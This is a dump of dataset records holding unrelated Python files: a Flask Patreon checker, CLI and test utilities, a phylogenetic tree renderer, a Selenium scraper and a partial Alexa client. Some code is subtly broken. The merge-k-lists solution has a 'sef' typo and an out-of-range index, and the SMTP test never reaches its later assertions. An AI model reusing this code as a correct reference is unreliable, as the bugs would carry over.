Blueprint('patreon', __name__, url_prefix='/patreon')\nfrom osalt.database import db_session, PatreonModel, Category\nimport hashlib\n\n\n@mod.route('/update')\ndef update_patreon():\n parameters = {'title': 'Validate Patreon', 'relative_location': '..'}\n return render_template('patreon/update.mako', **parameters)\n # return 'updating'\n\n\n@mod.route('/validate')\ndef validate():\n parameters = {'title': 'Validate Patreon', 'relative_location': '..'}\n return render_template('patreon/validate.mako', **parameters)\n\n\ndef __clear_db__():\n all_records = PatreonModel.query.all()\n for record in all_records:\n record.query.delete()\n db_session.commit()\n\n\n@mod.route('/process_csv2', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['activity_file']\n f.save('/tmp/uploaded_file.txt')\n\n\n@mod.route('/process_csv', methods=['POST'])\ndef store_activity_file_view():\n ##Flush DataBase\n __clear_db__()\n ##\n input_file = request.files.get('activity_file')\n\n # read the file into memory\n my_list = []\n for line in input_file.readlines():\n m = hashlib.md5()\n m.update(line.strip().lower())\n hashed = m.hexdigest()\n patreon = PatreonModel(hash=hashed)\n db_session.add(patreon)\n my_list.append(hashed)\n\n db_session.commit()\n\n parameters = {\n 'title': 'Patreon Processing',\n 'relative_location': '..',\n 'name': '%s patreons loaded into the database' % (len(my_list))\n }\n\n return render_template('generic.mako', **parameters)\n\n\n@mod.route('/check_email', methods=['POST'])\ndef check_email():\n email = request.form.get('email')\n m = hashlib.md5()\n m.update(email)\n hashed = m.hexdigest()\n foo = PatreonModel.query.filter_by(hash=hashed).first()\n\n if foo is not None:\n message = \"\"\"is a <span style=\"color:blue\"> valid </span> patreon\"\"\"\n else:\n message = \"\"\"is an <span style=\"color:red\">invalid </span> patreon\"\"\"\n\n parameters = {\n 'title': 'Patreon Processing',\n 'relative_location': '..',\n 'name': \"{email} {message}\".format(email=email, message=message)\n }\n return render_template('generic.mako', **parameters)\n","sub_path":"osalt/views/patreon.py","file_name":"patreon.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"431191574","text":"# -*- coding:utf-8 -*-\r\n# !/usr/bin/env python3\r\n\r\n\"\"\"\r\nHead\r\n\r\n\r\nUsage:\r\n head <filename> [-n=<n>] [--encoding=<encoding>] [--output=<output>] [--no-more]\r\n\r\nOptions:\r\n -n=<n> head number of the file [default: 5].\r\n --encoding=<encoding> point the encoding of the file manually\r\n --no-more don't use `more` to show\r\n\r\n\"\"\"\r\nimport cchardet as chardet\r\nimport minghu6\r\nfrom docopt import docopt\r\nfrom minghu6.etc import fileecho\r\nfrom color import color\r\nfrom minghu6.text.more import more\r\n\r\n\r\ndef main(path, n, encoding=None, no_more=False):\r\n try:\r\n with open(path, 'rb') as f:\r\n res_list = fileecho.head(f, n)\r\n res = b'\\n'.join(res_list)\r\n detect_result = chardet.detect(res)\r\n\r\n if encoding is not None:\r\n codec = encoding\r\n elif detect_result['confidence'] > 0.7:\r\n codec = detect_result['encoding']\r\n else:\r\n color.print_warn('Not Known encoding, may be %s.\\n'\r\n 'Please point it explictly' % detect_result['encoding'])\r\n return\r\n\r\n if no_more:\r\n color.print_info(res.decode(codec, errors='ignore'))\r\n else:\r\n more(res.decode(codec, errors='ignore'), print_color=True)\r\n\r\n except FileNotFoundError:\r\n color.print_err('%s not found' % path)\r\n except PermissionError:\r\n color.print_err('Permission denied: %s' % path)\r\n\r\n\r\ndef cli():\r\n arguments = docopt(__doc__, version=minghu6.__version__)\r\n\r\n n = int(arguments['-n'])\r\n encoding = arguments['--encoding']\r\n path = arguments['<filename>']\r\n no_more = arguments['--no-more']\r\n main(path, n, encoding=encoding, no_more=no_more)\r\n\r\n\r\nif __name__ == '__main__':\r\n cli()\r\n","sub_path":"minghu6/tools/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"535571105","text":"# 分治算法:链表两两合并,最终生成一个链表\nclass Solution(object):\n\tdef mergeKLists(self, lists):\n\t\tammout = len(lists)\n\t\t# 步长\n\t\tinterval = 1\n\t\twhile interval < ammout:\n\t\t\t# 生成一个有序整数序列,range(start, end, step)\n\t\t\t# 从0开始,两两合并:0,1,2,3,4,5->0,2,4->0,4->0\n\t\t\tfor i in range(0, ammout, interval * 2):\n\t\t\t\tlists[i] = sef.merge2List(lists[i], lists[i + interval])\n\t\t\tinterval *= 2\n\t\treturn lists[0] if ammout > 0 else lists\n\n\tdef merge2List(self, l1, l2):\n\t\t# 合并两个链表\n\t\thead = point = ListNode(0)\n\t\t# 将两个链表的值两两比较,生成一个降序的链表\n\t\twhile l1 and l2:\n\t\t\tif l1.val <= l2.val:\n\t\t\t\tpoint.next = l1\n\t\t\t\tl1 = l1.next\n\t\t\telse:\n\t\t\t\tpoint.next = l2\n\t\t\t\tl2 = l2.next\n\t\t\tpoint = point.next\n\t\t# 两个链表的长度不一样,剩下的链表可以直接连接到总链表的末尾\n\t\tif not l1:\n\t\t\tpoint.next = l2\n\t\telse:\n\t\t\tpoint.next = l1\n\t\treturn head.next\n","sub_path":"Merge k Sorted Lists/DiviveAndConquer.py","file_name":"DiviveAndConquer.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"276911820","text":"import unittest\nimport smtp_client\nimport configparser\n\n\nclass TestSMTPClient(unittest.TestCase):\n def test_parse_config(self):\n sender, _ = smtp_client.parse_config('etc/user.conf')\n self.assertEqual(sender, 'flyingicefr@163.com')\n\n def test_parse_config_exception(self):\n with self.assertRaises(OSError):\n smtp_client.parse_config('etc/nonexist.conf')\n\n with self.assertRaises(KeyError):\n smtp_client.parse_config('etc/invalid_key.conf')\n\n with self.assertRaises(configparser.MissingSectionHeaderError):\n smtp_client.parse_config('etc/missing_header.conf')\n\n def test_validate_email(self):\n smtp_client.validate_email('abc.def@gmail.com')\n\n with self.assertRaises(ValueError):\n smtp_client.validate_email('abc')\n smtp_client.validate_email('@163.com')\n smtp_client.validate_email('xyz@123@hotmail.com')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"mail-client/smtp_test.py","file_name":"smtp_test.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"96569805","text":"competidores=int(input(\"Digite o número de competidores: \"))\r\nnumero_folhas=int(input(\"Digite o número de folhas compradas: \"))\r\nfolha_por_pessoa=int(input(\"Digite o número de folhas para cada competidor: \"))\r\nif(competidores>=1 and competidores<=1000 and numero_folhas>=1 and numero_folhas<=1000 and folha_por_pessoa>=1 and folha_por_pessoa<=1000):\r\n\ts=folha_por_pessoa*competidores\r\n\tif(s>numero_folhas):\r\n\t\tprint(\"N\")\r\n\telse:\r\n\t\tprint(\"S\")\r\nelse:\r\n\tprint(\"Número inválido.\")","sub_path":"estrutura de repeticao/camp3.py","file_name":"camp3.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"200568491","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 1 09:03:18 2019\n\n@author: Rebeka\n\"\"\"\n\nimport pandas as pd\nfrom sklearn import metrics\n\npopisPutanja = ['test2/poslijeMAX/podaciSOznakomKlastera14.csv', \\\n 'test3/poslijeMAX/podaciSOznakomKlastera11.csv', \\\n 'test4/poslijeMAX/podaciSOznakomKlastera14.csv', \\\n 'test4/poslijeMAX/podaciSOznakomKlastera16.csv',\\\n 'test5/poslijeMAX/podaciSOznakomKlastera16.csv',\\\n 'test5/poslijeMAX/podaciSOznakomKlastera18.csv',\\\n 'test7/prijeMAX/podaciSOznakomKlastera17.csv',\\\n 'test7/poslijeMAX/podaciSOznakomKlastera18.csv']\n \npopisPutanja2 = ['test2/poslijeMAX+temp/podaciSOznakomKlastera10.csv', \\\n 'test2/poslijeMAX+temp/podaciSOznakomKlastera14.csv', \\\n 'test2/poslijeMAX+temp/podaciSOznakomKlastera18.csv']\n \npopisPutanja3 = ['test3/poslijeMAX+temp/podaciSOznakomKlastera10.csv', \\\n 'test3/poslijeMAX+temp/podaciSOznakomKlastera11.csv', \\\n 'test3/poslijeMAX+temp/podaciSOznakomKlastera16.csv']\n \npopisPutanja4 = ['test4/poslijeMAX+temp/podaciSOznakomKlastera6.csv', \\\n 'test4/poslijeMAX+temp/podaciSOznakomKlastera14.csv', \\\n 'test4/poslijeMAX+temp/podaciSOznakomKlastera16.csv', \\\n 'test4/poslijeMAX+temp/podaciSOznakomKlastera18.csv']\n \npopisPutanja5 = ['test5/poslijeMAX+temp/podaciSOznakomKlastera13.csv', \\\n 'test5/poslijeMAX+temp/podaciSOznakomKlastera16.csv', \\\n 'test5/poslijeMAX+temp/podaciSOznakomKlastera18.csv',\\\n 'test5/poslijeMAX+temp/podaciSOznakomKlastera19.csv']\n \npopisPutanja6 = ['test7/prijeMAX+temp/podaciSOznakomKlastera12.csv', \\\n 'test7/prijeMAX+temp/podaciSOznakomKlastera15.csv', \\\n 'test7/prijeMAX+temp/podaciSOznakomKlastera17.csv']\n \npopisPutanja7 = ['test7/poslijeMAX+temp/podaciSOznakomKlastera10.csv', \\\n 'test7/poslijeMAX+temp/podaciSOznakomKlastera11.csv', \\\n 'test7/poslijeMAX+temp/podaciSOznakomKlastera15.csv']\n \n\npodaci = pd.read_csv(popisPutanja[0])\noznake = podaci.label.values\nfor i in range(len(popisPutanja2)):\n print(popisPutanja[0], popisPutanja2[i])\n podaci2 = pd.read_csv(popisPutanja2[i])\n oznake2 = podaci2.label.values\n print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n \nprint()\nprint()\n\npodaci = pd.read_csv(popisPutanja[1])\noznake = podaci.label.values\nfor i in range(len(popisPutanja3)):\n print(popisPutanja[1], popisPutanja3[i])\n podaci2 = pd.read_csv(popisPutanja3[i])\n oznake2 = podaci2.label.values\n print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n \nprint()\nprint()\n\npodaci = pd.read_csv(popisPutanja[2])\noznake = podaci.label.values\nfor i in range(len(popisPutanja4)):\n print(popisPutanja[2], popisPutanja4[i])\n podaci2 = pd.read_csv(popisPutanja4[i])\n oznake2 = podaci2.label.values\n print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n \nprint()\nprint()\n\npodaci = pd.read_csv(popisPutanja[3])\noznake = podaci.label.values\nfor i in range(len(popisPutanja4)):\n print(popisPutanja[3], popisPutanja4[i])\n podaci2 = pd.read_csv(popisPutanja4[i])\n oznake2 = podaci2.label.values\n print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n \nprint()\nprint()\n\npodaci = pd.read_csv(popisPutanja[4])\noznake = podaci.label.values\nfor i in range(len(popisPutanja5)):\n print(popisPutanja[4], popisPutanja5[i])\n podaci2 = pd.read_csv(popisPutanja5[i])\n oznake2 = podaci2.label.values\n print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n \nprint()\nprint()\n\npodaci = pd.read_csv(popisPutanja[5])\noznake = podaci.label.values\nfor i in range(len(popisPutanja5)):\n print(popisPutanja[5], popisPutanja5[i])\n podaci2 = pd.read_csv(popisPutanja5[i])\n oznake2 = podaci2.label.values\n print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n \nprint()\nprint()\n\npodaci = pd.read_csv(popisPutanja[6])\noznake = podaci.label.values\nfor i in range(len(popisPutanja6)):\n print(popisPutanja[6], popisPutanja6[i])\n podaci2 = pd.read_csv(popisPutanja6[i])\n oznake2 = podaci2.label.values\n print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n \nprint()\nprint()\n\npodaci = pd.read_csv(popisPutanja[7])\noznake = podaci.label.values\nfor i in range(len(popisPutanja7)):\n print(popisPutanja[7], popisPutanja7[i])\n podaci2 = pd.read_csv(popisPutanja7[i])\n oznake2 = podaci2.label.values\n print(metrics.adjusted_mutual_info_score(oznake, oznake2))\n\n \n","sub_path":"racunanjeAMI+temp.py","file_name":"racunanjeAMI+temp.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"395241504","text":"# -*- coding: utf-8 -*-\n'''\nDescription of Script\n\nUSAGE:\n phylo_tree (-h | --help)\n phylo_tree <filepath_newick> [<alignment_filepath>] --option=<option> (--horizontal|--vertical) [--dummy]\n\nOPTIONS:\n -h --help Show this screen.\n <filepath_newick> file path of newick format.\n <filepath_alignment> drow alignment status in output file.\n --option:\n 1 : pie\n 2 : alignment\n'''\nfrom docopt import docopt\nif __name__ == '__main__':\n arguments = docopt(__doc__)\nfrom pprint import pprint as pp\nfrom ete2 import PhyloTree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, EvolTree, Tree,PieChartFace\nfrom ete2.treeview.layouts import evol_clean_layout\nimport math\nimport random\nimport sys\nimport re\n\ndef replace_inferred(t):\n \"\"\"\n replace inferred with what has 0 of distance to parent-node\n sample id format that is made by integration is\n sampleid1_sampleid2_sampleid3_....\n \"\"\"\n if t.is_leaf():\n return t\n else:\n names = []\n leaves = []\n trees = []\n for child in t.children:\n if child.is_leaf() and child.dist == 0.0:\n leaves.append(child)\n elif child.dist == 0.0:\n names.append(child.name)\n trees.extend(child.children)\n else:\n trees.append(child)\n trees = map(replace_inferred, trees)\n trees2 = []\n for node in trees:\n if node.is_leaf() and node.dist == 0.0:\n leaves.append(node)\n elif node.dist == 0.0:\n names.append(node.name)\n trees2.extend(node.children)\n else:\n trees2.append(node)\n t.name = \"\"\n for leaf in leaves:\n t.name += leaf.name + \"_\"\n for name in names:\n t.name += name + \"_\"\n #if re.match(r\"_*\", t.name):\n # t.name = \"inferred\"\n t.children = trees2\n return t\n\n\"\"\"\nfunctions for use of base.62 characters\n\"\"\"\ndef _make_use_chars_base_62():\n return [str(i) for i in xrange(0, 10)] + \\\n [chr(i) for i in xrange(ord('a'), ord('z')+1)] + \\\n [chr(i) for i in xrange(ord('A'), ord('Z')+1)]\n\ndef encode_base_62(decimal):\n base_62_str = ''\n use_chars = _make_use_chars_base_62()\n while True:\n base_62_str = use_chars[decimal % 62] + base_62_str\n decimal -= decimal % 62\n decimal /= 62\n if decimal == 0:\n break\n return base_62_str\n\ndef decode_base_62(base_62_str):\n decimal = 0\n use_chars = _make_use_chars_base_62()\n for c in base_62_str:\n decimal *= 62\n decimal += use_chars.index(c)\n return decimal\n\ndef decode_id(_id):\n elms = _id.split(\"-\")\n if not len(elms) == 3:\n return _id\n iso_type = elms[0][0]\n serial_num = decode_base_62(elms[0][1:])\n read_cnt = decode_base_62(elms[1])\n missmatch_cnt = decode_base_62(elms[2])\n return iso_type + str(serial_num) + \"-\" + str(read_cnt) + \"-\" + str(missmatch_cnt)\n\n\ndef decode_tree(t):\n \"\"\"\n all nodes' name (base 62) -> (base 10)\n by Recursion\n\n Args:\n PhyloTree Object\n Returns:\n PhyloTree Object\n \"\"\"\n t.name = decode_id(t.name)\n if t.is_leaf():\n return t\n else:\n t.children = map(decode_tree, t.children)\n return t\n\ndef give_weight(t):\n \"\"\"\n give all node weight\n by Recursion\n\n Args:\n PhyloTree Object\n Returns:\n PhyloTree Object\n \"\"\"\n rand = random.randint(20, 40)\n t.add_feature(\"weight\", rand)\n if t.is_leaf():\n return t\n else:\n t.children = map(give_weight, t.children)\n return t\n\ndef cat_strs(strs, dlm):\n \"\"\"\n Args:\n strs : strings[]\n dlm(delimiter) : character\n Returns:\n string\n \"\"\"\n if len(strs) == 0:\n return \"\"\n else:\n return strs[0] + dlm + cat_strs(strs[1:], dlm)\n\nnuc_arr = [\"A\", \"T\", \"G\", \"C\"]\n\ndef random_alg(n):\n \"\"\"\n create random arry(nuc) whose length is n\n\n Args :\n n\n Returns:\n array(string)\n \"\"\"\n def random_alg_sub(n, arr):\n rand = random.randint(0, 3)\n if n == 0:\n return arr\n else:\n return random_alg_sub(n - 1, arr + nuc_arr[rand])\n return random_alg_sub(n, \"\")\n\ndef make_rand_fasta(t):\n if t.is_leaf():\n rand_arr = random_alg(6)\n print(rand_arr)\n return (\">\" + t.name + \"\\n\" + rand_arr)\n else:\n strs = map(make_rand_fasta, t.children)\n return cat_strs(strs, \"\\n\")\n\ndef parse_node_name(node_name):\n \"\"\"\n parse node name and get the parcent of isotype, read_cnt, and\n\n Args:\n node_name\n Returns:\n (IgA cnt, IgG cnt, IgM cnt)\n \"\"\"\n names = node_name.split(\"_\")\n iga_cnt = 0\n igg_cnt = 0\n igm_cnt = 0\n for name in names:\n elms = name.split(\"-\")\n if len(elms) == 0:\n continue\n else:\n if \"A\" in elms[0]:\n iga_cnt += int(elms[1])\n elif \"G\" in elms[0]:\n igg_cnt += int(elms[1])\n elif \"M\" in elms[0]:\n igm_cnt += int(elms[1])\n return iga_cnt, igg_cnt, igm_cnt\n\ndef fine_circle_size(read_cnt):\n \"\"\"\n refine circle size according to the SAMPLE_ID (this is expected by filepath_newick)\n \"\"\"\n \"\"\"\n if \"315T.5212\" in filepath_newick:\n return math.log(read_cnt, 10)\n if \"315T.1131\" in filepath_newick:\n return math.log(read_cnt, 10)\n if \"314T.2136\" in filepath_newick:\n return math.log(read_cnt, 10)\n \"\"\"\n if read_cnt == 0:\n return 0\n\n if \"315T.5018\" in filepath_newick:\n return math.log10(read_cnt) * 5.5\n return math.log10(read_cnt) * 6\n\ndef del_dist(t):\n nodes = t.search_nodes()\n for node in nodes:\n node.del_feature(\"dist\")\n return\n\ndef make_dist_constant(t):\n \"\"\"\n make all nodes' distance constant (for visiblity)\n\n Args:\n PhyloTree Object\n \"\"\"\n nodes = t.search_nodes()\n for node in nodes:\n node.dist = 1\n return\n\ndef make_germline_top(t):\n \"\"\"\n move germline-node to top of tree\n \"\"\"\n germline = t.search_nodes(name=\"germline\")[0]\n germline_parent = germline.up\n germline_parent.remove_child(germline)\n germline.children = [germline_parent]\n return germline\n\ndef add_dummy(t, n):\n \"\"\"\n add dummy to the top whose read count is 'n'\n\n Args:\n PhyloTree Object, dummy's read_cnt\n Returns:\n PhyloTree Object\n \"\"\"\n dummy = PhyloTree()\n dummy.add_feature(\"iga_cnt\", 0)\n dummy.add_feature(\"igg_cnt\", 0)\n dummy.add_feature(\"igm_cnt\", n)\n dummy.add_feature(\"read_cnt\", n)\n dummy.name = \"dummy\"\n dummy.children = [t]\n return dummy\n\n\ndef format_node_name(node):\n node.name = node.name.replace(\"NULL_\", \"\")\n node.name = node.name.replace(\"_\", \"&\")\n node.name = node.name.strip(\"&\")\n ids = node.name.split(\"&\")\n new_ids = []\n for id in ids:\n if len(id.split(\"-\")) != 3:\n new_ids.append(id)\n continue\n new_ids.append(id.split(\"-\")[2])\n node.name = cat_strs(new_ids, \"&\")[0:-1]\n\ndef give_node_color(t):\n nstyle_normal = NodeStyle()\n nstyle_normal[\"shape\"] = \"circle\"\n nstyle_normal[\"size\"] = 6\n nstyle_normal[\"fgcolor\"] = \"Black\"\n nstyle_inferred = NodeStyle()\n nstyle_inferred[\"shape\"] = \"circle\"\n nstyle_inferred[\"size\"] = 6\n nstyle_inferred[\"fgcolor\"] = \"LightGray\"\n for n in t.traverse():\n if n.name == \"\":\n n.set_style(nstyle_inferred)\n else:\n n.set_style(nstyle_normal)\n\ndef add_features(t):\n for node in t.traverse():\n (iga_cnt, igg_cnt, igm_cnt) = parse_node_name(node.name)\n node.add_feature(\"iga_cnt\", iga_cnt)\n node.add_feature(\"igg_cnt\", igg_cnt)\n node.add_feature(\"igm_cnt\", igm_cnt)\n node.add_feature(\"read_cnt\", iga_cnt + igg_cnt + igm_cnt)\n return\n\ndef print_all_features(t):\n for node in t.traverse():\n print(\"name :\" + node.name + \", iga_cnt : \"+ str(node.iga_cnt) + \", igg_cnt : \" + str(node.igg_cnt) +\", igm_cnt : \" + str(node.igm_cnt) + \", read_cnt : \" + str(node.read_cnt))\n\n\ndef layout_circle(node):\n if node.name != \"\":\n faces.add_face_to_node(AttrFace(\"name\"), node, column=0, position=\"branch-right\")\n\n if(node.read_cnt == 0):\n return\n\n read_cnts = [node.iga_cnt, node.igg_cnt, node.igm_cnt]\n colors = ['RoyalBlue', 'DarkOrange', 'LimeGreen']\n div = 2.5\n\n Ps = [CircleFace(radius=fine_circle_size(cnt)/div, color=color, style='circle') for cnt, color in\n zip(read_cnts, colors)]\n\n for i, P in enumerate(Ps):\n P.opacity = 0.3\n P.border.width = None\n if arguments['--horizontal']:\n column_index = i\n elif arguments['--vertical']:\n column_index = 0\n faces.add_face_to_node(P, node, column_index, position=\"float\")\n format_node_name(node)\n\ndef layout_pie(node):\n if node.name != \"\":\n faces.add_face_to_node(AttrFace(\"name\"), node, column=0, position=\"branch-right\")\n\n if(node.read_cnt == 0):\n print(\"error\")\n return\n\n (iga_parcent, igg_percent, igm_percent) = (node.iga_cnt * 100.0 / node.read_cnt, node.igg_cnt * 100.0 / node.read_cnt, node.igm_cnt * 100.0 / node.read_cnt)\n\n P = PieChartFace(\n percents=[iga_parcent, igg_percent, igm_percent],\n colors=[\"RoyalBlue\", \"DarkOrange\", \"LimeGreen\"],\n height=fine_circle_size(node.read_cnt),\n width=fine_circle_size(node.read_cnt)\n )\n\n P.opacity = 0.3\n P.border.width = None\n\n faces.add_face_to_node(P, node, 0, position=\"float\")\n format_node_name(node)\n return\n\ndef layout_alg(node):\n # Add node name to laef nodes\n N = AttrFace(\"name\", fsize=20, fgcolor=\"black\")\n (iga_cnt, igg_cnt, igm_cnt) = parse_node_name(node.name)\n print(iga_cnt, igg_cnt, igm_cnt)\n read_cnt = iga_cnt + igg_cnt + igm_cnt\n if \"weight\" in node.features and read_cnt != 0:\n# Creates a sphere face whose size is proportional to node's\n# feature \"weight\"\n (iga_parcent, igg_percent, igm_percent) = (iga_cnt * 100.0 / read_cnt, igg_cnt * 100.0 / read_cnt, igm_cnt * 100.0 / read_cnt)\n P = PieChartFace(percents=[iga_parcent, igg_percent, igm_percent],colors=[\"RoyalBlue\", \"DarkOrange\", \"LimeGreen\"], height=fine_circle_size(read_cnt), width=fine_circle_size(read_cnt))\n# Let's make the sphere transparent\n P.opacity = 0.3\n P.border.width = None\n# And place as a float face over the tree\n faces.add_face_to_node(P, node, 0, position=\"float\")\n\n\"\"\"\nconstance\n\"\"\"\nMIN_SEPARATION = 25\n\ndef draw_tree(\n option,\n filepath_newick,\n filepath_alignment=None,\n dummy=False,\n ):\n if(option == 1):\n ts = TreeStyle()\n ts.layout_fn = layout_circle\n # ts.layout_fn = layout_pie\n ts.allow_face_overlap = False\n ts.show_leaf_name = False\n ts.min_leaf_separation = MIN_SEPARATION\n ts.show_branch_length = False\n ts.show_branch_support = False\n\n t = PhyloTree(filepath_newick, format=1)\n print(filepath_newick)\n print(t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n\n t = decode_tree(t)\n t = replace_inferred(t)\n t = make_germline_top(t)\n add_features(t)\n if dummy:\n t = add_dummy(t, 100)\n t = add_dummy(t, 1000)\n t = add_dummy(t, 10000)\n#t = give_weight(t)\n give_node_color(t)\n#del_dist(t)\n make_dist_constant(t)\n#alg = make_rand_fasta(t)\n#t.link_to_alignment(alg)\n t.render(filepath_newick.replace(\".newick\", \".png\"), w=3000, tree_style=ts)\n print_all_features(t)\n#t.render(\"mytree.png\",tree_style=ts)\n print(filepath_newick + \"_replaced\")\n print(t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n elif(option == 2):\n# Create an empty TreeStyle\n ts = TreeStyle()\n# Set our custom layout function\n#ts.layout_fn = layout\n#ts.layout_fn = evol_clean_layout\n# Draw a tree\n#ts.mode = \"c\"\n# We will add node names manually\n ts.show_leaf_name = True\n# Show branch data\n#ts.scale = 120\n#ts.arc_start = 0 # 0 degrees = 3 o'clock\n#ts.arc_span = 180\n ts.min_leaf_separation = 10\n ts.show_branch_length = False\n ts.show_branch_support = False\n\n t = EvolTree(filepath_newick, format=1)\n print(filepath_newick)\n print(t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n\n#t = decode_tree(t)\n#t = replace_inferred(t)\n#t = give_weight(t)\n#t = make_germline_top(t)\n#del_dist(t)\n make_dist_constant(t)\n#alg = make_rand_fasta(t)\n alg_file = open(filepath_alignment, \"r\")\n alg = alg_file.read()\n\n t.link_to_alignment(alg,nucleotides=False)\n#t.workdir = './workspace'\n#t.run_model('SLR', keep=False)\n#t.render(\"mytree.png\", histfaces=['SLR'], w=3000, tree_style=ts)\n t.render(filepath_newick.replace(\".newick\", \".png\"), w=3000, tree_style=ts)\n#t.render(\"mytree.png\",tree_style=ts)\n print(filepath_newick + \"_replaced\")\n print(t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n#print(sample_t.get_ascii(attributes = [\"name\", \"dist\"], show_internal=True))\n\nif __name__ == '__main__':\n filepath_newick = arguments['<filepath_newick>']\n option = int(arguments['--option'])\n\n if arguments['--dummy']:\n print('dummy on')\n draw_tree(option, filepath_newick, None, True)\n else:\n print('dummy off')\n draw_tree(option, filepath_newick, None, False)\n","sub_path":"PhyloTree/phylo_tree.py","file_name":"phylo_tree.py","file_ext":"py","file_size_in_byte":13650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"379236069","text":"from flask import Flask, render_template\nimport requests\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport json\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\n\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods = ['GET'])\ndef get_dato():\n options = webdriver.ChromeOptions()\n options.add_argument(\"headless\")\n options.add_argument(\"no-sandbox\")\n driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n urls = [\"https://webscraper.io/test-sites/e-commerce/scroll/computers/laptops\", \"https://webscraper.io/test-sites/e-commerce/scroll/computers/tablets\", \"https://webscraper.io/test-sites/e-commerce/scroll/phones/touch\"]\n\n for url in urls:\n driver.get(url)\n print('url', url)\n time.sleep(2)\n screen_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(2)\n scroll_height = driver.execute_script(\"return document.body.scrollHeight\")\n print('height',scroll_height)\n if scroll_height == screen_height:\n print('break while')\n break\n screen_height = scroll_height\n\n\n allObj = BeautifulSoup(driver.page_source, 'html.parser')\n dataProducts = allObj.findAll(\"div\", {\"class\":\"caption\"})\n if(url==\"https://webscraper.io/test-sites/e-commerce/scroll/computers/laptops\"):\n\n datoL = list()\n for dataProduct in dataProducts:\n datoL.append({\n \"nombre\": dataProduct.find(\"a\", {\"class\":\"title\"}).text,\n \"caracteristicas\": dataProduct.find(\"p\", {\"class\":\"description\"}).text,\n \"valor\":dataProduct.find(\"h4\", {\"class\":\"price\"}).text\n })\n with open('laptops.json', 'w') as file:\n json.dump(datoL, file, indent=4, sort_keys=True)\n\n\n if(url==\"https://webscraper.io/test-sites/e-commerce/scroll/phones/touch\"):\n datoP = list()\n for dataProduct in dataProducts:\n datoP.append({\n \"nombre\": dataProduct.find(\"a\", {\"class\":\"title\"}).text,\n \"caracteristicas\": dataProduct.find(\"p\", {\"class\":\"description\"}).text,\n \"valor\":dataProduct.find(\"h4\", {\"class\":\"price\"}).text\n })\n with open('phones.json', 'w') as file:\n json.dump(datoP, file, indent=4, sort_keys=True)\n\n if(url==\"https://webscraper.io/test-sites/e-commerce/scroll/computers/tablets\"):\n\n datoT = list()\n for dataProduct in dataProducts:\n datoT.append({\n \"nombre\": dataProduct.find(\"a\", {\"class\":\"title\"}).text,\n \"caracteristicas\": dataProduct.find(\"p\", {\"class\":\"description\"}).text,\n \"valor\":dataProduct.find(\"h4\", {\"class\":\"price\"}).text\n })\n with open('tablets.json', 'w') as file:\n json.dump(datoT, file, indent=4, sort_keys=True)\n\n\n return render_template('index.html', datoP=datoP, datoL=datoL, datoT=datoT)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"22315213","text":"#! /usr/bin/env python\n\nimport os\nimport random\nimport time\nimport random\nfrom creds import *\nimport requests\nimport json\nimport re\nimport subprocess\nfrom memcache import Client\n\n# Setup\nrecorded = False\nservers = [\"127.0.0.1:11211\"]\nmc = Client(servers, debug=1)\npath = os.path.realpath(__file__).rstrip(os.path.basename(__file__))\n\n\ndef internet_on():\n print(\"Checking Internet Connection\")\n try:\n r = requests.get('https://api.amazon.com/auth/o2/token')\n print(\"Connection OK\")\n return True\n except:\n print(\"Connection Failed\")\n return False\n\n\ndef gettoken():\n token = mc.get(\"access_token\")\n refresh = refresh_token\n if token:\n return token\n elif refresh:\n payload = {\"client_id\": Client_ID, \"client_secret\": Client_Secret,\n \"refresh_token\": refresh, \"grant_type\": \"refresh_token\", }\n url = \"https://api.amazon.com/auth/o2/token\"\n print(\"payload=\")\n print(payload)\n r = requests.post(url, data=payload)\n print(\"res=\")\n print((r.text))\n resp = json.loads(r.text)\n mc.set(\"access_token\", resp['access_token'], 3570)\n return resp['access_token']\n else:\n return False\n\n\ndef alexa():\n url = 'https://access-alexa-na.amazon.com/v1/avs/speechrecognizer/recognize'\n headers = {'Authorization': 'Bearer %s' % gettoken()}\n d = { # a dict\n \"messageHeader\": {\n \"deviceContext\": [\n {\n \"name\": \"playbackState\",\n \"namespace\": \"AudioPlayer\",\n \"payload\": {\n \"streamId\": \"\",\n \"offsetInMilliseconds\": \"0\",\n \"playerActivity\": 